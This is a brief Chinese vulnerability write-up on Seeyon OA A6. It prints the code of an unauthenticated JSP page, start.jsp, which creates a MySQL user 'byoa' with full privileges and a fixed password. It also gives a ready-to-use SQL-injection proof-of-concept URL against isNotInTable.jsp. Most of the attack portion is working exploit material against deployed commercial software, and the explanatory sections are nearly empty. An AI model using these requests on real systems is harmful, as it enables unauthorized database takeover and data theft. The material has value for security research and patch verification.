致远OA A6 重置数据库账号密码漏洞¶
一、漏洞简介¶
二、漏洞影响¶
致远OA A6
三、复现过程¶
重置数据库账号密码防御
http://url/yyoa/ext/byoa/start.jsp
该文件的代码为:
<% Connection conn = null; PreparedStatement pstmt = null; String sql = "create user byoa IDENTIFIED by 'byoa'"; try { conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection(); pstmt = conn.prepareStatement(sql); out.print(pstmt.executeUpdate()); sql = "grant all on *.* to byoa"; pstmt = conn.prepareStatement(sql); out.println(pstmt.executeUpdate()); pstmt.close(); sql = "update mysql.user set password=password('byoa') where user='byoa'"; pstmt = conn.prepareStatement(sql); out.println(pstmt.executeUpdate()); pstmt.close(); sql = "flush privileges"; pstmt = conn.prepareStatement(sql); out.print(pstmt.executeUpdate()); pstmt.close(); //conn.close(); } catch (Exception ex) { out.println(ex.getMessage()); }%>
可以抛光该文件没有验证任何权限,便进行了重置数据库用户byoa的密码为:byoa
mysql + jsp注射
http://url/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp
poc
http://url/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23{'success':false,'errors':'root@localhost'}